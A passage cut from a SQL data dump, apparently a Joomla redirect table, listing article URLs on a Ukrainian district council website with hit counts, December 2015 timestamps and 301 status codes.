00:00:00',301),(20533,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1039:-l-r&Itemid=92&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:41:31','0000-00-00 00:00:00',301),(20534,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=579:-2011-2015-&Itemid=77&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:42:02','0000-00-00 00:00:00',301),(20535,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1074:2013-09-02-05-02-30&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:42:19','0000-00-00 00:00:00',301),(20536,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1023:-l-28r-&Itemid=92&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:42:26','0000-00-00 00:00:00',301),(20537,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=963:2013-03-13-06-16-53&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:42:28','0000-00-00 00:00:00',301),(20538,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=367:-1620-19072011-&Itemid=0&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:42:37','0000-00-00 00:00:00',301),(20539,'http://www.malyn-rayrada.org.ua/index.php?catid=2:2010-06-05-12-50-39&id=7:2010-06-05-14-44-23&Itemid=5&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:42:44','0000-00-00 00:00:00',301),(20540,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1341:-----------------14052014-&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:42:46','0000-00-00 00:00:00',301),(20541,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=833:2012-11-30-06-51-18&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:42:56','0000-00-00 00:00:00',301),(20542,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1192:-2014-2015-&Itemid=97&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:42:58','0000-00-00 00:00:00',301),(20543,'http://www.malyn-rayrada.org.ua/index.php?catid=34&id=348:2011-06-15-12-35-38&Itemid=68&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:43:05','0000-00-00 00:00:00',301),(20544,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1161:2013-12-18-13-34-32&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:43:08','0000-00-00 00:00:00',301),(20545,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1001:2013-04-30-12-14-17&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:43:10','0000-00-00 00:00:00',301),(20546,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1164:2013-12-29-11-46-36&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:43:12','0000-00-00 00:00:00',301),(20547,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1218:2014-02-21-15-02-18&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:43:17','0000-00-00 00:00:00',301),(20548,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=879:2012-12-21-17-02-01&Itemid=85&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:43:19','0000-00-00 00:00:00',301),(20549,'http://www.malyn-rayrada.org.ua/index.php?id=39&Itemid=76&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2015-12-11 01:43:21','0000-00-00 00:00:00',301),(20550,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=520:-2012-2013-&Itemid=73&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:43:23','0000-00-00 00:00:00',301),(20551,'http://www.malyn-rayrada.org.ua/index.php?catid=34:--15062011-&id=345:2011-06-15-12-28-17&Itemid=68&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:43:30','0000-00-00 00:00:00',301),(20552,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1191:-2014-&Itemid=97&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 01:43:34','0000-00-00 00:00:00',301),(20553,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=870:2012-12-17-07-02-51&Itemid=&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 01:43:36','0000-00-00 00:00:00',301),(20554,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=912:2013-01-22-14-14-06&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:43:38','0000-00-00 00:00:00',301),(20555,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=191:2010-12-15-13-27-06&Itemid=60&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:43:43','0000-00-00 00:00:00',301),(20556,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1326:-100-547&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-11 01:43:49','0000-00-00 00:00:00',301),(20557,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=846:2012-12-10-14-06-00&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:43:56','0000-00-00 00:00:00',301),(20558,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=635:-2011-2015-&Itemid=80&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:44:00','0000-00-00 00:00:00',301),(20559,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=328:2011-05-20-16-23-02&Itemid=66&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 01:44:06','0000-00-00 00:00:00',301),(20560,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=540:-2010-2015-&Itemid=76&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 01:44:11','0000-00-00 00:00:00',301),(20561,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1189:2014-01-28-09-46-45&Itemid=97&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:44:13','0000-00-00 00:00:00',301),(20562,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=721:-lr&Itemid=82&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 01:44:19','0000-00-00 00:00:00',301),(20563,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=833:2012-11-30-06-51-18&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:44:24','0000-00-00 00:00:00',301),(20564,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1145:2013-11-27-09-47-11&Itemid=&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:44:26','0000-00-00 00:00:00',301),(20565,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=608:2012-03-15-08-40-03&Itemid=0&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:44:33','0000-00-00 00:00:00',301),(20566,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1195:2014-01-28-13-01-27&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:44:35','0000-00-00 00:00:00',301),(20567,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=644:2012-04-04-09-52-48&Itemid=0&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:44:37','0000-00-00 00:00:00',301),(20568,'http://www.malyn-rayrada.org.ua/index.php?id=39:-22022012-&Itemid=76&lang=ru&layout=blog&limitstart=15&option=com_content&view=category','','','',2,0,'2015-12-11 01:44:39','0000-00-00 00:00:00',301),(20569,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=510:-2011-&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:44:42','0000-00-00 00:00:00',301),(20570,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=707:-231-280312-l-2012-r&Itemid=82&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:44:44','0000-00-00 00:00:00',301),(20571,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1108:-----------24-----&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:44:50','0000-00-00 00:00:00',301),(20572,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=744:2012-07-28-09-50-03&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:44:54','0000-00-00 00:00:00',301),(20573,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=598:2012-02-29-14-13-44&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:44:58','0000-00-00 00:00:00',301),(20574,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=705:-l-r&Itemid=82&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:45:01','0000-00-00 00:00:00',301),(20575,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1115:-24-&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:45:03','0000-00-00 00:00:00',301),(20576,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=779:2012-10-03-12-34-44&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:45:05','0000-00-00 00:00:00',301),(20577,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1074:2013-09-02-05-02-30&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:45:07','0000-00-00 00:00:00',301),(20578,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1022:-lr-&Itemid=92&lang=uk&option=com_content&view=article','','','',4,0,'2015-12-11 01:45:09','0000-00-00 00:00:00',301),(20579,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=610:2012-03-23-06-34-31&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:45:18','0000-00-00 00:00:00',301),(20580,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=912:2013-01-22-14-14-06&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:45:20','0000-00-00 00:00:00',301),(20581,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1197:-----l---r------&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:45:22','0000-00-00 00:00:00',301),(20582,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1090:-l-r-&Itemid=94&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:45:31','0000-00-00 00:00:00',301),(20583,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=938:---------------6612-------626-&Itemid=86&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:45:33','0000-00-00 00:00:00',301),(20584,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1141:2013-11-26-13-18-12&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:45:35','0000-00-00 00:00:00',301),(20585,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=194:-----------2008-2010-&Itemid=60&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:45:42','0000-00-00 00:00:00',301),(20586,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=596:2012-02-28-12-59-05&Itemid=77&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:45:44','0000-00-00 00:00:00',301),(20587,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=766:2012-09-28-08-37-31&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 01:45:46','0000-00-00 00:00:00',301),(20588,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=580:-l-r-2012-2016-&Itemid=77&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:46:02','0000-00-00 00:00:00',301),(20589,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=692:-2012&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:46:10','0000-00-00 00:00:00',301),(20590,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1000:1&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:46:12','0000-00-00 00:00:00',301),(20591,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1190:------------2014--&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:46:14','0000-00-00 00:00:00',301),(20592,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=206:2010-12-15-14-19-27&Itemid=60&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:46:19','0000-00-00 00:00:00',301),(20593,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=637:2012-04-03-12-34-11&Itemid=80&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:46:40','0000-00-00 00:00:00',301),(20594,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1095:2013-09-24-13-25-55&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:46:44','0000-00-00 00:00:00',301),(20595,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1138:-15112013&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:46:46','0000-00-00 00:00:00',301),(20596,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=613:2012-03-26-14-13-34&Itemid=14&lang=uk&option=com_content&view=article','','','',4,0,'2015-12-11 01:46:48','0000-00-00 00:00:00',301),(20597,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=911:2013-01-22-13-27-41&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:47:00','0000-00-00 00:00:00',301),(20598,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=439:2011-10-21-16-22-19&Itemid=72&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:47:02','0000-00-00 00:00:00',301),(20599,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1069:23--------&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:47:14','0000-00-00 00:00:00',301),(20600,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=764:2012-09-26-12-58-07&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:47:16','0000-00-00 00:00:00',301),(20601,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=827:2012-11-20-17-44-21&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:47:18','0000-00-00 00:00:00',301),(20602,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1098:2013-09-25-09-34-57&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:47:20','0000-00-00 00:00:00',301),(20603,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=802:-i-i-i-i-i&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:47:22','0000-00-00 00:00:00',301),(20604,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1007:-4-&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 01:47:58','0000-00-00 00:00:00',301),(20605,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=411:-2014-&Itemid=72&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:48:04','0000-00-00 00:00:00',301),(20606,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=615:-------26032012495-12&Itemid=77&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:48:10','0000-00-00 00:00:00',301),(20607,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=926:2013-02-21-09-02-30&Itemid=86&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:48:12','0000-00-00 00:00:00',301),(20608,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1209:-----2014-&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:48:14','0000-00-00 00:00:00',301),(20609,'http://www.malyn-rayrada.org.ua/index.php?catid=31&id=270:-4-6-&Itemid=62&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:48:16','0000-00-00 00:00:00',301),(20610,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1157:-11-2013-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:48:18','0000-00-00 00:00:00',301),(20611,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=671:2012-05-09-13-09-05&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:48:31','0000-00-00 00:00:00',301),(20612,'http://www.malyn-rayrada.org.ua/index.php?catid=34&id=344:2011-06-15-12-25-27&Itemid=68&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 01:48:33','0000-00-00 00:00:00',301),(20613,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=512:2011-12-21-12-46-13&Itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:48:35','0000-00-00 00:00:00',301),(20614,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1114:-lr-&Itemid=94&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:48:37','0000-00-00 00:00:00',301),(20615,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1096:2013-09-24-13-34-16&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:48:39','0000-00-00 00:00:00',301),(20616,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=524:2011-12-30-10-17-39&Itemid=73&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:48:45','0000-00-00 00:00:00',301),(20617,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=922:2013-02-11-10-53-17&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:48:47','0000-00-00 00:00:00',301),(20618,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1311:-69-1941-1945-&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2015-12-11 01:48:56','0000-00-00 00:00:00',301),(20619,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1121:-24-6-&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:49:01','0000-00-00 00:00:00',301),(20620,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=189:2010-12-15-13-21-57&Itemid=60&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:49:03','0000-00-00 00:00:00',301),(20621,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=326:2011-05-20-16-17-28&Itemid=66&lang=uk&option=com_content&view=article','','','',4,0,'2015-12-11 01:49:05','0000-00-00 00:00:00',301),(20622,'http://www.malyn-rayrada.org.ua/index.php?catid=58:--30042014-&id=1293:-2014-&Itemid=105&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-11 01:49:09','0000-00-00 00:00:00',301),(20623,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1082:------------2012-2015-&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:49:11','0000-00-00 00:00:00',301),(20624,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=608:2012-03-15-08-40-03&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:49:17','0000-00-00 00:00:00',301),(20625,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1218:2014-02-21-15-02-18&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:49:19','0000-00-00 00:00:00',301),(20626,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=819:2012-11-14-16-40-09&Itemid=84&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 01:49:21','0000-00-00 00:00:00',301),(20627,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1190:-2014-&Itemid=97&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:49:31','0000-00-00 00:00:00',301),(20628,'http://www.malyn-rayrada.org.ua/index.php?id=49&Itemid=88&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2015-12-11 01:49:34','0000-00-00 00:00:00',301),(20629,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1203:-2014-&Itemid=97&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:49:40','0000-00-00 00:00:00',301),(20630,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=964:-2013-2017-&Itemid=88&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:49:49','0000-00-00 00:00:00',301),(20631,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1048:2013-07-10-05-53-06&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:49:53','0000-00-00 00:00:00',301),(20632,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=914:2013-01-23-13-21-28&Itemid=86&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:50:34','0000-00-00 00:00:00',301),(20633,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1024:-l-2011-2014-r-&Itemid=92&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:50:45','0000-00-00 00:00:00',301),(20634,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1096:2013-09-24-13-34-16&Itemid=94&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:50:47','0000-00-00 00:00:00',301),(20635,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=804:2012-10-28-18-37-40&Itemid=0&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 01:51:23','0000-00-00 00:00:00',301),(20636,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=724:-27042012252&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:51:25','0000-00-00 00:00:00',301),(20637,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1125:2013-10-31-07-20-16&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 01:51:28','0000-00-00 00:00:00',301),(20638,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=795:--------20--2011--108-l---r----&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:51:50','0000-00-00 00:00:00',301),(20639,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=463:----------------2007-2015-&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:51:54','0000-00-00 00:00:00',301),(20640,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=823:2012-11-14-16-52-28&Itemid=84&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:52:02','0000-00-00 00:00:00',301),(20641,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1023:-l-28r-&Itemid=92&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:52:04','0000-00-00 00:00:00',301),(20642,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=940:2013-02-21-14-02-14&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:52:10','0000-00-00 00:00:00',301),(20643,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1022:-lr-&Itemid=92&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:52:17','0000-00-00 00:00:00',301),(20644,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1064:2013-08-09-07-52-21&Itemid=0&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 01:52:21','0000-00-00 00:00:00',301),(20645,'http://www.malyn-rayrada.org.ua/index.php?catid=16&id=277:-2010-&Itemid=39&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 01:52:23','0000-00-00 00:00:00',301),(20646,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=514:2011-12-22-10-03-07&Itemid=73&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:52:37','0000-00-00 00:00:00',301),(20647,'http://www.malyn-rayrada.org.ua/index.php?catid=5:2010-06-05-12-51-34&id=166:-6-&Itemid=6&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 01:52:43','0000-00-00 00:00:00',301),(20648,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=409:----------2011-&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:52:46','0000-00-00 00:00:00',301),(20649,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=188:2010-12-15-13-18-12&Itemid=60&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:52:49','0000-00-00 00:00:00',301),(20650,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1200:2014-01-31-07-40-52&Itemid=97&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:52:51','0000-00-00 00:00:00',301),(20651,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=827:2012-11-20-17-44-21&lang=en&option=com_content&view=article','','','',4,0,'2015-12-11 01:53:04','0000-00-00 00:00:00',301),(20652,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1340:------l---28r&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:53:45','0000-00-00 00:00:00',301),(20653,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=627:2012-04-02-15-57-23&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:53:53','0000-00-00 00:00:00',301),(20654,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1089:-l-r-&Itemid=94&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:53:56','0000-00-00 00:00:00',301),(20655,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=779:2012-10-03-12-34-44&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:53:58','0000-00-00 00:00:00',301),(20656,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=819:2012-11-14-16-40-09&Itemid=84&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:54:15','0000-00-00 00:00:00',301),(20657,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1046:-----------2013----&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:54:19','0000-00-00 00:00:00',301),(20658,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=367:-1620-19072011-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:54:23','0000-00-00 00:00:00',301),(20659,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1199:-l-r-&Itemid=97&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:54:27','0000-00-00 00:00:00',301),(20660,'http://www.malyn-rayrada.org.ua/index.php?Itemid=&lang=ru&option=com_phocagallery&view=categories','','','',2,0,'2015-12-11 01:54:36','0000-00-00 00:00:00',301),(20661,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=910:-22-&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:55:09','0000-00-00 00:00:00',301),(20662,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=880:2012-12-21-17-03-54&Itemid=85&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:55:15','0000-00-00 00:00:00',301),(20663,'http://www.malyn-rayrada.org.ua/index.php?id=54:--29112013-&Itemid=95&lang=uk&layout=blog&option=com_content&view=category','','','',2,0,'2015-12-11 01:55:28','0000-00-00 00:00:00',301),(20664,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1062:2013-07-29-13-33-29&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 01:55:33','0000-00-00 00:00:00',301),(20665,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=520:-2012-2013-&Itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:55:39','0000-00-00 00:00:00',301),(20666,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=634:-2016-&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:56:37','0000-00-00 00:00:00',301),(20667,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=408:-2011-&Itemid=72&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:56:42','0000-00-00 00:00:00',301),(20668,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=723:2012-06-18-14-29-08&Itemid=82&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:56:54','0000-00-00 00:00:00',301),(20669,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1001:2013-04-30-12-14-17&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:56:59','0000-00-00 00:00:00',301),(20670,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=189:2010-12-15-13-21-57&Itemid=60&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:57:05','0000-00-00 00:00:00',301),(20671,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=644:2012-04-04-09-52-48&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:57:10','0000-00-00 00:00:00',301),(20672,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1112:2013-10-23-09-24-43&Itemid=94&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:57:28','0000-00-00 